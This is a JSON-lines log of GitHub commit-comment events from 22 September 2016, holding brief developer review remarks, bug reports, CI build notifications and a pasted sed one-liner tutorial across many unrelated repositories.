{"id":"4603292232","type":"CommitCommentEvent","actor":{"login":"Clownacy"},"repo":{"name":"DarkMorford/scd-bios-disassembly"},"payload":{"comment":{"id":19132313,"position":null,"line":null,"path":null,"commit_id":"4a30f46a559c2c536ab5ac4588465881c5831e4c","created_at":"2016-09-22T15:41:45Z","updated_at":"2016-09-22T15:41:45Z","body":"I'm afraid not. I usually just monitor the driver through RegenD's RAM viewer."}},"created_at":"2016-09-22T15:41:45Z"}
{"id":"4603295193","type":"CommitCommentEvent","actor":{"login":"eri-trabiccolo"},"repo":{"name":"presscustomizr/front-jquery-plugins"},"payload":{"comment":{"id":19132320,"position":17,"line":72,"path":"jqueryimgSmartLoad.js","commit_id":"27ff4a0951ccd5a10208820c24af7a442d9c6227","created_at":"2016-09-22T15:42:11Z","updated_at":"2016-09-22T15:42:11Z","body":"Forgot to remove, sorry.\r\nYeah, safer but checking this every time honestly becomes too much. Not expansive I see but another useless line of code while we should simple remember to use that polyfill :D \r\nI think we can remember it :D \r\nEven the centerImages and imgSmartLoad use $.originalWidth (Height)  without checks... (my fault also in those cases :D )"}},"created_at":"2016-09-22T15:42:11Z"}
{"id":"4603298268","type":"CommitCommentEvent","actor":{"login":"ramanbuttar"},"repo":{"name":"dry-rb/dry-validation"},"payload":{"comment":{"id":19132328,"position":null,"line":null,"path":null,"commit_id":"54d073ba1e544022f05f6f982203bb1703eb9ccf","created_at":"2016-09-22T15:42:41Z","updated_at":"2016-09-22T15:42:41Z","body":"Could you guys put out a new release with this change included? Need it as part of https://github.com/accessd/rails-settings-ui"}},"created_at":"2016-09-22T15:42:41Z"}
{"id":"4603307572","type":"CommitCommentEvent","actor":{"login":"rolfea"},"repo":{"name":"rolfea/BlocRecord"},"payload":{"comment":{"id":19132351,"position":27,"line":27,"path":"assignment_answers.txt","commit_id":"4ac3f3d4705fd48e95700a7bfa7630a633b105aa","created_at":"2016-09-22T15:44:10Z","updated_at":"2016-09-22T15:44:10Z","body":"Working on fixing this one - is there a bug in the original curriculum?  \r\n`self.class.connection.execute` <<-SQL\r\n       UPDATE #{self.class.table}\r\n       SET #{fields}\r\n       WHERE id = #{self.id};\r\n     SQL\r\n`\r\nShouldn't the SET command here have the syntax pattern of `column-name = expression` or:  \r\n`SET #{fields} = attributes[0], #{fields} = attributes[1]`"}},"created_at":"2016-09-22T15:44:10Z"}
{"id":"4603308486","type":"CommitCommentEvent","actor":{"login":"NicolasPetton"},"repo":{"name":"NicolasPetton/zerodark-theme"},"payload":{"comment":{"id":19132354,"position":null,"line":null,"path":null,"commit_id":"58572d9a93e2e152160195e551bbd25101a3c09b","created_at":"2016-09-22T15:44:19Z","updated_at":"2016-09-22T15:44:19Z","body":"Thanks!"}},"created_at":"2016-09-22T15:44:19Z"}
{"id":"4603314684","type":"CommitCommentEvent","actor":{"login":"ibab"},"repo":{"name":"ibab/cyres"},"payload":{"comment":{"id":19132370,"position":null,"line":null,"path":null,"commit_id":"0c4d4417b9a5b263a5fa77c8d3ef1b75bd2576ff","created_at":"2016-09-22T15:45:16Z","updated_at":"2016-09-22T15:45:16Z","body":"Sorry, this fork is super broken, as I've started re-implementing various bits, but stopped before it was usable."}},"created_at":"2016-09-22T15:45:16Z"}
{"id":"4603319037","type":"CommitCommentEvent","actor":{"login":"Moaz113"},"repo":{"name":"Moaz113/Documents"},"payload":{"comment":{"id":19132377,"position":null,"line":null,"path":null,"commit_id":"2ff269f21ea01f67aa31c89cd66fc41a029ed37a","created_at":"2016-09-22T15:45:57Z","updated_at":"2016-09-22T15:45:57Z","body":"What's sed?\r\n\r\nSed is the superman of UNIX stream editing. It's a small utility that's present on every UNIX system and it transforms one stream of text into another. Let's take a look at several practical examples that sed can carry out easily. All these examples and many more are explained in the e-book.\r\n\r\nI have also made the first chapter of the book, Introduction to sed, freely available. Please download the e-book preview to read it. The introductory chapter explains the general principles of sed, introduces the four spaces of sed, addresses and ranges, and various command line flags.\r\n\r\nExample 1: Replace \"lamb\" with \"goat\" on every line\r\n\r\nsed 's/lamb/goat/'\r\nThis one-liner uses the famous s/.../.../ command. The s command substitutes the text in the first part of the command with the text in the second part. In this one-liner it replaces \"lamb\" with \"goat\".\r\n\r\nA very detailed explanation of how sed reads the lines, how it executes the commands and how the printing happens is presented in the freely available introduction chapter. Please take a look.\r\n\r\nExample 2: Replace only the second occurrence of \"lamb\" with \"goat\" on every line\r\n\r\nsed 's/lamb/goat/2'\r\nSed is the only tool that I know that takes a numeric argument to the s command. The numeric argument, in this case 2, specifies which occurrence of the text to replace. In this example only the 2nd occurrence of \"lamb\" gets replaced with \"goat\".\r\n\r\nExample 3: Number the lines in a file\r\n\r\nsed = file | sed 'N; s/\\n/: /'\r\nThis one-liner is actually two one-liners. The first one uses the = command that inserts a line containing the line number before every original line in the file. Then this output gets piped to the second sed command that joins two adjacent lines with the N command. When joining lines with the N command, a newline character \\n is placed between them. Therefore it uses the s command to replace this newline \\n with a colon followed by a space \": \".\r\n\r\nSo for example, if the file contains lines:\r\n\r\nhello world\r\ngood job\r\nsunny day\r\nThen after running the one-liner, the result is going to be:\r\n\r\n1: hello world\r\n2: good job\r\n3: sunny day\r\nExample 4: Delete every 2nd line\r\n\r\nsed 'n;d'\r\nThis one-liner uses the n command that prints the current line (actually the current pattern space, see the introduction chapter for in-depth explanation), deletes it, and reads the next line. Then sed executes the d command that deletes the current line without printing. This way the 1st line gets printed, the 2nd line gets deleted, then the 3rd line gets printed again, then the 4th gets deleted, etc.\r\n\r\nExample 5: ROT 13 encode every line\r\n\r\nsed '\r\ny/abcdefghijklmnopqrstuvwxyz/nopqrstuvwxyzabcdefghijklm/\r\ny/ABCDEFGHIJKLMNOPQRSTUVWXYZ/NOPQRSTUVWXYZABCDEFGHIJKLM/\r\n'\r\nHere the y/set1/set2/ command is used. The y command substitutes elements in the set1 with the corresponding elements in the set2. The first y command replaces all lowercase letters with their 13-char-shifted counterparts, and the second y command does the same for the uppercase letters. So for example, character a gets replaced by n, b gets replaced by o, character Z gets replaced by M, etc.\r\n\r\nSed is actually very powerful. It's as powerful as a Turing machine, meaning you can write any computer program in it. Check out these programs written in sed. Run them as sed -f file.sed:"}},"created_at":"2016-09-22T15:45:57Z"}
{"id":"4603323084","type":"CommitCommentEvent","actor":{"login":"solnic"},"repo":{"name":"dry-rb/dry-validation"},"payload":{"comment":{"id":19132389,"position":null,"line":null,"path":null,"commit_id":"54d073ba1e544022f05f6f982203bb1703eb9ccf","created_at":"2016-09-22T15:46:36Z","updated_at":"2016-09-22T15:46:36Z","body":"@ramanbuttar yes I'll push a release shortly"}},"created_at":"2016-09-22T15:46:36Z"}
{"id":"4603327089","type":"CommitCommentEvent","actor":{"login":"cstrahan"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19132397,"position":104,"line":162,"path":"nixos/modules/virtualisation/containers.nix","commit_id":"b9df84cd4f6b70bdfa395a91dbf3d712adc7e18d","created_at":"2016-09-22T15:47:16Z","updated_at":"2016-09-22T15:47:16Z","body":"@edolstra This is another case where `cfg.attribute` should probably be `cfg.${attribute}`."}},"created_at":"2016-09-22T15:47:16Z"}
{"id":"4603327147","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19132400,"position":null,"line":null,"path":null,"commit_id":"9d76fb79681830d151f3cf830f8070313d3c7db6","created_at":"2016-09-22T15:47:18Z","updated_at":"2016-09-22T15:47:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1124](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13981&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T15:47:18Z"}
{"id":"4603327782","type":"CommitCommentEvent","actor":{"login":"SirBrucey"},"repo":{"name":"SirBrucey/pyirccat"},"payload":{"comment":{"id":19132401,"position":63,"line":359,"path":"pyirccat.py","commit_id":"4e6b78718415e393f52004c64ef8edcbc25e7d0c","created_at":"2016-09-22T15:47:23Z","updated_at":"2016-09-22T15:47:23Z","body":"I am stupid. Ignore this ever happened!!!"}},"created_at":"2016-09-22T15:47:23Z"}
{"id":"4603329501","type":"CommitCommentEvent","actor":{"login":"chuan6"},"repo":{"name":"chuan6/structured-law-document"},"payload":{"comment":{"id":19132406,"position":null,"line":null,"path":null,"commit_id":"af737de6bfd88c7c1499428e4b0cc4b004f74c79","created_at":"2016-09-22T15:47:39Z","updated_at":"2016-09-22T15:47:39Z","body":"Bug found: there are currently two ways the hash can be changed to \"#\":\r\n\r\n1. extra clicks on back-button;\r\n2. selection clearing clicks.\r\n\r\nWhile scroll to the top of the page is a reasonable behavior for 1, it is not for 2. For 2, the page should stay put."}},"created_at":"2016-09-22T15:47:39Z"}
{"id":"4603332758","type":"CommitCommentEvent","actor":{"login":"albat92"},"repo":{"name":"PointCloudLibrary/pcl"},"payload":{"comment":{"id":19132412,"position":null,"line":null,"path":null,"commit_id":"c6338b25d5165bb2483403234cc1c61394b897eb","created_at":"2016-09-22T15:48:12Z","updated_at":"2016-09-22T15:48:12Z","body":"I think there are still symbols (pkg-config search for 2d from pcl_features-1.8.pc) I had to revert this commit to compile python-pcl."}},"created_at":"2016-09-22T15:48:12Z"}
{"id":"4603332839","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19132413,"position":null,"line":null,"path":null,"commit_id":"9d76fb79681830d151f3cf830f8070313d3c7db6","created_at":"2016-09-22T15:48:13Z","updated_at":"2016-09-22T15:48:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1124](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13981&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:00:55"}},"created_at":"2016-09-22T15:48:13Z"}
{"id":"4603333264","type":"CommitCommentEvent","actor":{"login":"nrhint"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19132416,"position":null,"line":null,"path":null,"commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-22T15:48:17Z","updated_at":"2016-09-22T15:48:17Z","body":"I cant figure out the problem."}},"created_at":"2016-09-22T15:48:17Z"}
{"id":"4603333404","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19132417,"position":null,"line":null,"path":null,"commit_id":"79164127b90d08cb0d17a8c4cad1fa10cb2720f1","created_at":"2016-09-22T15:48:18Z","updated_at":"2016-09-22T15:48:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1125](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13984&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T15:48:18Z"}
{"id":"4603339605","type":"CommitCommentEvent","actor":{"login":"s85465788"},"repo":{"name":"s85465788/test"},"payload":{"comment":{"id":19132435,"position":null,"line":null,"path":null,"commit_id":"106e92792adcf47b0dacc18a13f8d116da6a3afa","created_at":"2016-09-22T15:49:18Z","updated_at":"2016-09-22T15:49:18Z","body":"第二次修改"}},"created_at":"2016-09-22T15:49:18Z"}
{"id":"4603340311","type":"CommitCommentEvent","actor":{"login":"nebukazar"},"repo":{"name":"nebukazar/OneeChan"},"payload":{"comment":{"id":19132436,"position":8,"line":26,"path":"src/css/Catalog.css","commit_id":"1451db0c2f75902213648d472963f9a817c82576","created_at":"2016-09-22T15:49:25Z","updated_at":"2016-09-22T15:49:25Z","body":"I honestly don't remember.\r\n\r\nIf it causes problems we can remove it, that's no problem."}},"created_at":"2016-09-22T15:49:25Z"}
{"id":"4603347908","type":"CommitCommentEvent","actor":{"login":"zeroasterisk"},"repo":{"name":"zillow/react-dimensions"},"payload":{"comment":{"id":19132445,"position":null,"line":null,"path":null,"commit_id":"e88e86bf8f36b159bbf9610ed3d2d1898fa7a4eb","created_at":"2016-09-22T15:50:37Z","updated_at":"2016-09-22T15:50:37Z","body":"I really like this additional option --- are you planning on submitting a PR to the main project?"}},"created_at":"2016-09-22T15:50:37Z"}
{"id":"4603350814","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19132451,"position":14,"line":14,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T15:51:04Z","updated_at":"2016-09-22T15:51:04Z","body":"Wondering if this CSS related tooling should be here at all? Is this not covered (or should be) under the CSS section?"}},"created_at":"2016-09-22T15:51:04Z"}
{"id":"4603353132","type":"CommitCommentEvent","actor":{"login":"AZGALOR1337"},"repo":{"name":"AZGALOR1337/xoxo"},"payload":{"comment":{"id":19132459,"position":2,"line":2,"path":"weq.txt","commit_id":"3b9dbce52159164db188797e9356a8bb51260448","created_at":"2016-09-22T15:51:27Z","updated_at":"2016-09-22T15:51:27Z","body":"dfgdf"}},"created_at":"2016-09-22T15:51:27Z"}
{"id":"4603357717","type":"CommitCommentEvent","actor":{"login":"retrobenny"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":19132467,"position":null,"line":null,"path":null,"commit_id":"3567dc6bf012686419ae493cc9a2711be30a25db","created_at":"2016-09-22T15:52:11Z","updated_at":"2016-09-22T15:52:11Z","body":"Nice to see this fix after I had found the address in PJ64's memory search/viewer that the cheat-engine guide obscures.\r\nThe end result I had still ran into issues with the sky moving where the refresh point made the sky jump into place."}},"created_at":"2016-09-22T15:52:11Z"}
{"id":"4603358725","type":"CommitCommentEvent","actor":{"login":"secknv"},"repo":{"name":"secknv/pymod"},"payload":{"comment":{"id":19132470,"position":58,"line":101,"path":"core.py","commit_id":"e0bcc266740ad74d252580262c76eb6f18e51023","created_at":"2016-09-22T15:52:19Z","updated_at":"2016-09-22T15:52:19Z","body":">I can't believe this has been here since the 23rd Feb.  \r\n\r\n-- secknv 22nd Sept. "}},"created_at":"2016-09-22T15:52:19Z"}
{"id":"4603364948","type":"CommitCommentEvent","actor":{"login":"knewter"},"repo":{"name":"bitwalker/exirc"},"payload":{"comment":{"id":19132488,"position":null,"line":null,"path":null,"commit_id":"daf1bef3a4dca08fdd589d2980a52a09883251f2","created_at":"2016-09-22T15:53:17Z","updated_at":"2016-09-22T15:53:17Z","body":"@bitwalker out of curiosity, why not include the test / a test as well?"}},"created_at":"2016-09-22T15:53:17Z"}
{"id":"4603366111","type":"CommitCommentEvent","actor":{"login":"JamesBremner"},"repo":{"name":"gustav21/Pack"},"payload":{"comment":{"id":19132490,"position":null,"line":null,"path":null,"commit_id":"db2c534ef311e97c3fcb15d375f2e075edb3d77a","created_at":"2016-09-22T15:53:29Z","updated_at":"2016-09-22T15:53:29Z","body":"You wrote: \"These changes allows IsAboveBelow bug to occur.\"\r\n\r\nI believe you meant to say something like: These changes test the fix in commit 1133deb3a6d126d1b05927fa86e234232daf60f8"}},"created_at":"2016-09-22T15:53:29Z"}
{"id":"4603371303","type":"CommitCommentEvent","actor":{"login":"kxepal"},"repo":{"name":"HypothesisWorks/hypothesis-python"},"payload":{"comment":{"id":19132496,"position":6,"line":6,"path":"tests/py3/test_annotations.py","commit_id":"e89ad24668e8699452d66b70695363ad5cd7e3c1","created_at":"2016-09-22T15:54:16Z","updated_at":"2016-09-22T15:54:16Z","body":"But today is 2016, isn't it?"}},"created_at":"2016-09-22T15:54:16Z"}
{"id":"4603371344","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19132497,"position":21,"line":54,"path":"src/server/game/Server/Protocol/Opcodes.h","commit_id":"77e0801a15d4736972d3c458b1f282b7ff2a9d8c","created_at":"2016-09-22T15:54:17Z","updated_at":"2016-09-22T15:54:17Z","body":"ok, I think better for memake SAI 👍 not C++ ))))))"}},"created_at":"2016-09-22T15:54:17Z"}
{"id":"4603373561","type":"CommitCommentEvent","actor":{"login":"xabre"},"repo":{"name":"xabre/xamarin-bluetooth-le"},"payload":{"comment":{"id":19132503,"position":null,"line":null,"path":null,"commit_id":"9ac8dc1b6f9c913ed17e29974e9c1c015c5f7cd3","created_at":"2016-09-22T15:54:36Z","updated_at":"2016-09-22T15:54:36Z","body":" // TODO figure out if this is in any way required,  "}},"created_at":"2016-09-22T15:54:36Z"}
{"id":"4603374012","type":"CommitCommentEvent","actor":{"login":"dansanti"},"repo":{"name":"dansanti/l10n_cl_dte"},"payload":{"comment":{"id":19132505,"position":null,"line":null,"path":null,"commit_id":"08b3e241f9d76e15f3da8efd1e3e0f32400e94e9","created_at":"2016-09-22T15:54:40Z","updated_at":"2016-09-22T15:54:40Z","body":"El manejo del cron aún es un poco básico, ya que hace 1 llamada por minuto, por lo que sale o se consulta un documento por minuto, se debe mejorar para que se pueda automáticamente hacer un lote de envío "}},"created_at":"2016-09-22T15:54:40Z"}
{"id":"4603374521","type":"CommitCommentEvent","actor":{"login":"secknv"},"repo":{"name":"secknv/pymod"},"payload":{"comment":{"id":19132506,"position":79,"line":115,"path":"core.py","commit_id":"e0bcc266740ad74d252580262c76eb6f18e51023","created_at":"2016-09-22T15:54:44Z","updated_at":"2016-09-22T15:54:44Z","body":">I can't believe this has been here since the 23rd Feb.\r\n\r\n—secknv, 22nd Sept. 2016 after deleting the first `helplist[func] =`"}},"created_at":"2016-09-22T15:54:44Z"}
{"id":"4603376425","type":"CommitCommentEvent","actor":{"login":"bitwalker"},"repo":{"name":"bitwalker/exirc"},"payload":{"comment":{"id":19132511,"position":null,"line":null,"path":null,"commit_id":"daf1bef3a4dca08fdd589d2980a52a09883251f2","created_at":"2016-09-22T15:55:01Z","updated_at":"2016-09-22T15:55:01Z","body":"@knewter You mean the test you wrote? I did, just in a separate commit [here](https://github.com/bitwalker/exirc/commit/4539c8f5f81c11389a6d1d14525fcf5152f0a181) :)"}},"created_at":"2016-09-22T15:55:01Z"}
{"id":"4603379469","type":"CommitCommentEvent","actor":{"login":"vsapronov"},"repo":{"name":"syncloud/sam"},"payload":{"comment":{"id":19132516,"position":8,"line":40,"path":"bin/sam.py","commit_id":"8df1b0437f8f90840cc98cfde40c941270313b18","created_at":"2016-09-22T15:55:28Z","updated_at":"2016-09-22T15:55:28Z","body":"We need this because it's used to create rootfs + all system apps installed. This is the only way to create image."}},"created_at":"2016-09-22T15:55:28Z"}
{"id":"4603394208","type":"CommitCommentEvent","actor":{"login":"onieto1"},"repo":{"name":"onieto1/ucc-"},"payload":{"comment":{"id":19132552,"position":2,"line":2,"path":"README.md","commit_id":"597710688e3b34600038d69cb12c6b4243b10e73","created_at":"2016-09-22T15:57:48Z","updated_at":"2016-09-22T15:57:48Z","body":"prueba \r\n"}},"created_at":"2016-09-22T15:57:48Z"}
{"id":"4603398083","type":"CommitCommentEvent","actor":{"login":"DRMacIver"},"repo":{"name":"HypothesisWorks/hypothesis-python"},"payload":{"comment":{"id":19132558,"position":6,"line":6,"path":"tests/py3/test_annotations.py","commit_id":"e89ad24668e8699452d66b70695363ad5cd7e3c1","created_at":"2016-09-22T15:58:27Z","updated_at":"2016-09-22T15:58:27Z","body":"So it is. I should fix the header. Thanks."}},"created_at":"2016-09-22T15:58:27Z"}
{"id":"4603410569","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19132583,"position":null,"line":null,"path":null,"commit_id":"79164127b90d08cb0d17a8c4cad1fa10cb2720f1","created_at":"2016-09-22T16:00:23Z","updated_at":"2016-09-22T16:00:23Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1125](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13984&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:12:04"}},"created_at":"2016-09-22T16:00:23Z"}
{"id":"4603411026","type":"CommitCommentEvent","actor":{"login":"masato-haruta"},"repo":{"name":"opdsk/my-1st-errand"},"payload":{"comment":{"id":19132584,"position":null,"line":null,"path":null,"commit_id":"456775790fc69ce04f0ae0a4e3e05bda1d0c19b3","created_at":"2016-09-22T16:00:27Z","updated_at":"2016-09-22T16:00:27Z","body":"ええですね"}},"created_at":"2016-09-22T16:00:27Z"}
{"id":"4603413909","type":"CommitCommentEvent","actor":{"login":"adriennebelle"},"repo":{"name":"adriennebelle/phase-0-tracks"},"payload":{"comment":{"id":19132592,"position":null,"line":null,"path":null,"commit_id":"6de101bb726732c6d5cbf9f6091648c2aa429b62","created_at":"2016-09-22T16:00:54Z","updated_at":"2016-09-22T16:00:54Z","body":"@bontgoy"}},"created_at":"2016-09-22T16:00:54Z"}
{"id":"4603418023","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19132604,"position":56,"line":56,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T16:01:32Z","updated_at":"2016-09-22T16:01:32Z","body":"Should this be `// eslint some-feature: \"off\"` as it's a single line comment?"}},"created_at":"2016-09-22T16:01:32Z"}
{"id":"4603418164","type":"CommitCommentEvent","actor":{"login":"ashishjacob07"},"repo":{"name":"GlebTsoy/Software-Engineering"},"payload":{"comment":{"id":19132606,"position":null,"line":null,"path":null,"commit_id":"91a0450e8f4e6a469990b5357fedbc09d86fb4f4","created_at":"2016-09-22T16:01:34Z","updated_at":"2016-09-22T16:01:34Z","body":"**Good job Gleb!** "}},"created_at":"2016-09-22T16:01:34Z"}
{"id":"4603419568","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19132609,"position":58,"line":58,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T16:01:47Z","updated_at":"2016-09-22T16:01:47Z","body":"here too // ?"}},"created_at":"2016-09-22T16:01:47Z"}
{"id":"4603421476","type":"CommitCommentEvent","actor":{"login":"psilo909"},"repo":{"name":"smarthomeNG/smarthome"},"payload":{"comment":{"id":19132612,"position":null,"line":null,"path":null,"commit_id":"c3e223c1c64bb68ee39a76f54d3209357fbd76b3","created_at":"2016-09-22T16:02:05Z","updated_at":"2016-09-22T16:02:05Z","body":"@ohinckel did u test the webbased code editor for logics (the CodeMirror one)? just curious.."}},"created_at":"2016-09-22T16:02:05Z"}
{"id":"4603426796","type":"CommitCommentEvent","actor":{"login":"opntr"},"repo":{"name":"HardenedBSD/hardenedBSD"},"payload":{"comment":{"id":19132625,"position":49,"line":124,"path":"libexec/rtld-elf/map_object.c","commit_id":"699831ecceb7ceb71034a4d75d0ea9b4906b3897","created_at":"2016-09-22T16:02:55Z","updated_at":"2016-09-22T16:02:55Z","body":"Missing HARDENEDBSD guard. If you compile your system WITHOUT_HARDENEDBSD, then the buildworld should fail."}},"created_at":"2016-09-22T16:02:55Z"}
{"id":"4603427590","type":"CommitCommentEvent","actor":{"login":"opntr"},"repo":{"name":"HardenedBSD/hardenedBSD"},"payload":{"comment":{"id":19132627,"position":56,"line":131,"path":"libexec/rtld-elf/map_object.c","commit_id":"699831ecceb7ceb71034a4d75d0ea9b4906b3897","created_at":"2016-09-22T16:03:03Z","updated_at":"2016-09-22T16:03:03Z","body":"Same here."}},"created_at":"2016-09-22T16:03:03Z"}
{"id":"4603429167","type":"CommitCommentEvent","actor":{"login":"smstuebe"},"repo":{"name":"xabre/xamarin-bluetooth-le"},"payload":{"comment":{"id":19132633,"position":null,"line":null,"path":null,"commit_id":"9ac8dc1b6f9c913ed17e29974e9c1c015c5f7cd3","created_at":"2016-09-22T16:03:19Z","updated_at":"2016-09-22T16:03:19Z","body":"ahhh ok ^^"}},"created_at":"2016-09-22T16:03:19Z"}
{"id":"4603429259","type":"CommitCommentEvent","actor":{"login":"opntr"},"repo":{"name":"HardenedBSD/hardenedBSD"},"payload":{"comment":{"id":19132634,"position":81,"line":261,"path":"libexec/rtld-elf/map_object.c","commit_id":"699831ecceb7ceb71034a4d75d0ea9b4906b3897","created_at":"2016-09-22T16:03:20Z","updated_at":"2016-09-22T16:03:20Z","body":"Here is good. :)"}},"created_at":"2016-09-22T16:03:20Z"}
{"id":"4603431211","type":"CommitCommentEvent","actor":{"login":"opntr"},"repo":{"name":"HardenedBSD/hardenedBSD"},"payload":{"comment":{"id":19132643,"position":4,"line":2432,"path":"libexec/rtld-elf/rtld.c","commit_id":"699831ecceb7ceb71034a4d75d0ea9b4906b3897","created_at":"2016-09-22T16:03:37Z","updated_at":"2016-09-22T16:03:37Z","body":"..."}},"created_at":"2016-09-22T16:03:37Z"}
{"id":"4603441097","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19132670,"position":null,"line":null,"path":null,"commit_id":"c343aeb8771335a12725efe4c4bccf219169537b","created_at":"2016-09-22T16:05:12Z","updated_at":"2016-09-22T16:05:12Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33221/testReport/) for this commit**"}},"created_at":"2016-09-22T16:05:12Z"}
{"id":"4603442610","type":"CommitCommentEvent","actor":{"login":"dlare"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19132671,"position":null,"line":null,"path":null,"commit_id":"8009866868177f3dfe0ff02d37c06b1a8dbd0b72","created_at":"2016-09-22T16:05:25Z","updated_at":"2016-09-22T16:05:25Z","body":"what is the meaning of break at lure? im using the bot. please enlighten me. and also i cant set default new location. please guide me . thank you"}},"created_at":"2016-09-22T16:05:25Z"}
{"id":"4603445944","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19132682,"position":58,"line":58,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T16:05:56Z","updated_at":"2016-09-22T16:05:56Z","body":"This seems at odds with the earlier statement of 'Do not use global variables.'"}},"created_at":"2016-09-22T16:05:56Z"}
{"id":"4603447005","type":"CommitCommentEvent","actor":{"login":"SoufianeAr"},"repo":{"name":"ITFOROMAN/afaqlib"},"payload":{"comment":{"id":19132683,"position":1,"line":1,"path":"test.txt","commit_id":"1e8280d56647d40146c97459392609eddb3df8fd","created_at":"2016-09-22T16:06:06Z","updated_at":"2016-09-22T16:06:06Z","body":"hello\r\n"}},"created_at":"2016-09-22T16:06:06Z"}
{"id":"4603448103","type":"CommitCommentEvent","actor":{"login":"SoufianeAr"},"repo":{"name":"ITFOROMAN/afaqlib"},"payload":{"comment":{"id":19132687,"position":null,"line":null,"path":null,"commit_id":"1e8280d56647d40146c97459392609eddb3df8fd","created_at":"2016-09-22T16:06:17Z","updated_at":"2016-09-22T16:06:17Z","body":"hello test"}},"created_at":"2016-09-22T16:06:17Z"}
{"id":"4603449247","type":"CommitCommentEvent","actor":{"login":"AdriVanHoudt"},"repo":{"name":"hapijs/bell"},"payload":{"comment":{"id":19132692,"position":4,"line":108,"path":"lib/index.js","commit_id":"705e1d0a9495dbcfd66df820487cb0a3d1533103","created_at":"2016-09-22T16:06:28Z","updated_at":"2016-09-22T16:06:28Z","body":"Why not 'Lax'?"}},"created_at":"2016-09-22T16:06:28Z"}
{"id":"4603451931","type":"CommitCommentEvent","actor":{"login":"robatron"},"repo":{"name":"zillow/react-dimensions"},"payload":{"comment":{"id":19132704,"position":null,"line":null,"path":null,"commit_id":"e88e86bf8f36b159bbf9610ed3d2d1898fa7a4eb","created_at":"2016-09-22T16:06:53Z","updated_at":"2016-09-22T16:06:53Z","body":"It's already merged into the main project :) \r\n\r\nhttps://github.com/digidem/react-dimensions/commit/09ee0f2bbd3d7ba63eda378ff160219c4d5f5681"}},"created_at":"2016-09-22T16:06:53Z"}
{"id":"4603452850","type":"CommitCommentEvent","actor":{"login":"karaktaka"},"repo":{"name":"CachetHQ/Cachet"},"payload":{"comment":{"id":19132709,"position":19,"line":48,"path":"app/Repositories/Metric/MySqlRepository.php","commit_id":"1fdda0319914ebf13cf2816926536ea13c3ec5cb","created_at":"2016-09-22T16:07:02Z","updated_at":"2016-09-22T16:07:02Z","body":"You forgot to add prefixes for metric_points too.\r\nNow you will only receive a code 500, because mysql won't find the other table if you use prefixes."}},"created_at":"2016-09-22T16:07:02Z"}
{"id":"4603454836","type":"CommitCommentEvent","actor":{"login":"woiph"},"repo":{"name":"GusCaplan/googlebot"},"payload":{"comment":{"id":19132712,"position":null,"line":null,"path":null,"commit_id":"dc8608363b32665b678ee4d8d8b6363d8b002f33","created_at":"2016-09-22T16:07:20Z","updated_at":"2016-09-22T16:07:20Z","body":"kek"}},"created_at":"2016-09-22T16:07:20Z"}
{"id":"4603457193","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19132725,"position":null,"line":null,"path":null,"commit_id":"bbb0d1efd2ec15dec3e0c3eefe58b99708cb869b","created_at":"2016-09-22T16:07:42Z","updated_at":"2016-09-22T16:07:42Z","body":"Green band is not (to fix them by adding libmmcamera_interface.so).\r\nBut there was another problem, band graphic artifacts, the offset frame.\r\nThis flag is, in fact, does not fix anything.\r\nSince it is included by default so msm8974 platforms.\r\nBut you can try to do to turn it off and check the result, and it will try.\r\n"}},"created_at":"2016-09-22T16:07:42Z"}
